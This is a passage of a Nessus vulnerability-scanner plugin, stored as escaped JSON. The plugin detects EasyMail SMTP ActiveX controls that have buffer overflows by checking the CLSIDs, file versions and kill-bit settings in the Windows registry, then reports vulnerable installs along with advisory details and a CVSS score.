Overflows\");\n script_summary(english:\"Checks version of EasyMail SMTP Object control\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Windows host has an ActiveX control that is affected by\nmultiple buffer overflow vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"EasyMail Objects, a set of COM objects for supporting email \nprotocols, is installed on the remote Windows host. 
It may have been \nbundled with a third-party application, such as Oracle Document \nCapture, Earthlink internet access software, Borland Caliber RM \nClient, and FrontRange Heat.\n\nThe SMTP component of the version of this control installed on the\nremote host reportedly contains multiple buffer overflows involving \nthe AddAttachment and SubmitToExpress methods that could lead to \narbitrary code execution on the affected system. Successful \nexploitation requires, though, that an attacker trick a user on the\naffected host into visiting a specially crafted web page.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.securityfocus.com/archive/1/526440/30/0/threaded\");\n script_set_attribute(attribute:\"solution\", value:\n\"Either disable its use from within Internet Explorer by setting its\nkill bit or remove it completely.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\nscript_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Oracle Document Capture 10g ActiveX Control Buffer Overflow');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_cwe_id(119);\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2007/08/28\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2007/09/25\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows\");\n script_copyright(english:\"This script is Copyright (C) 2007-2018 Tenable Network Security, Inc.\");\n\n script_dependencies(\"smb_hotfixes.nasl\");\n 
script_require_keys(\"SMB/Registry/Enumerated\");\n script_require_ports(139, 445);\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"smb_func.inc\");\ninclude(\"smb_activex_func.inc\");\n\n\nget_kb_item_or_exit(\"SMB/Registry/Enumerated\");\nif (activex_init() != ACX_OK) audit(AUDIT_FN_FAIL, 'activex_init');\n\n\n# Locate the file used by the controls.\nclsids = make_list(\n \"{4610E7BF-710F-11D3-813D-00C04F6B92D0}\", # Borland Caliber\n \"{68AC0D5F-0424-11D5-822F-00C04F6BA8D9}\"\n);\n\ninfo = \"\";\ninstalls = 0;\n\nforeach clsid (clsids)\n{\n file = activex_get_filename(clsid:clsid);\n if (isnull(file))\n {\n activex_end();\n exit(1, \"activex_get_filename() returned NULL.\");\n }\n\n if (!file) continue;\n\n installs++;\n\n # Get its version.\n version = activex_get_fileversion(clsid:clsid);\n if (isnull(version))\n {\n activex_end();\n audit(AUDIT_VER_FAIL, file);\n }\n\n if (version == '') version = 'unknown';\n\n # And check it.\n if (report_paranoia > 1 || activex_get_killbit(clsid:clsid) == 0)\n {\n info += \n '\\n Class identifier : ' + clsid +\n '\\n Filename : ' + file +\n '\\n Installed version : ' + version + '\\n';\n }\n}\nactivex_end();\nif (!installs) exit(0, 'None of the affected CLSIDs were found on the remote host.');\n\n\n# Report findings.\nif (info)\n{\n # At this point, we want to know how many *vulnerable* installs there are.\n installs = max_index(split(info)) / 4;\n\n if (report_paranoia > 1)\n {\n if (installs == 1)\n report = info +\n '\\n' +\n '\\nNote, though, that Nessus did not check whether the kill bit was set' +\n '\\nfor the control\\'s CLSID because of the Report Paranoia setting in' +\n '\\neffect when this scan was run.\\n';\n else\n report = info +\n '\\n' +\n '\\nNote, though, that Nessus did not check whether the kill bits were set' +\n '\\nfor the controls\\' CLSIDs because of the Report Paranoia setting in' +\n '\\neffect when this scan was run.\\n';\n }\n 
else\n {\n if (installs == 1)\n report = info +\n '\\n' +\n '\\nMoreover, its kill bit is not set so it is accessible via Internet' +\n '\\nExplorer.\\n';\n else\n report = info +\n '\\n' +\n '\\nMoreover, their kill bits are not set so they are accessible via' +\n '\\nInternet Explorer.\\n';\n }\n\n if (report_verbosity > 0) security_hole(port:kb_smb_transport(), extra:report);\n else security_hole(kb_smb_transport());\n exit(0);\n}\nelse \n{\n if (installs == 1) exit(0, 'One of the controls is installed but its kill bit is set.');\n else exit(0, 'The controls are installed but their kill bits are set.');\n}\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}]}